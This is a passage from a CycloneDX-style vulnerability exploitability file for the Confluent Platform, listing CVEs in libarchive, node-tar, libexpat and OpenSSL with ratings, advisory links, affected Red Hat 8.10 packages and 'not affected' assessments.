          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64118",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        362,
        367
      ],
      "description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64118"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9"
        },
        {
          "url": "https://github.com/isaacs/node-tar/issues/445"
        },
        {
          "url": "https://github.com/isaacs/node-tar/pull/446"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64118"
        }
      ],
      "published": "2025-10-30T18:15:33+00:00",
      "updated": "2026-06-17T09:53:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-66382",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-66382"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/12/02/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-66382"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1076"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66382"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
        }
      ],
      "published": "2025-11-28T07:15:57+00:00",
      "updated": "2026-06-17T09:56:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-68160",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Writing large, newline-free data into a BIO chain using the\nline-buffering filter where the next BIO performs short writes can trigger\na heap-based out-of-bounds write.\n\nImpact summary: This out-of-bounds write can cause memory corruption which\ntypically results in a crash, leading to Denial of Service for an application.\n\nThe line-buffering BIO filter (BIO_f_linebuffer) is not used by default in\nTLS/SSL data paths. In OpenSSL command-line applications, it is typically\nonly pushed onto stdout/stderr on VMS systems. Third-party applications that\nexplicitly use this filter with a BIO chain that can short-write and that\nwrite large, newline-free data influenced by an attacker would be affected.\nHowever, the circumstances where this could happen are unlikely to be under\nattacker control, and BIO_f_linebuffer is unlikely to be handling non-curated\ndata controlled by an attacker. For that reason the issue was assessed as\nLow severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the BIO implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68160"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-g78j-46j5-97cr"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/384011202af92605d926fafe4a0bcd6b65d162ad"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/475c466ef2fbd8fc1df6fae1c3eed9c813fc8ff6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4c96fbba618e1940f038012506ee9e21d32ee12c"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/6845c3b6460a98b1ec4e463baa2ea1a63a32d7c0"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/68a7cd2e2816c3a02f4d45a2ce43fc04fac97096"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-68160.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68160"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68160"
        }
      ],
      "published": "2026-01-27T16:16:15+00:00",
      "updated": "2026-06-17T09:58:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-68972",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
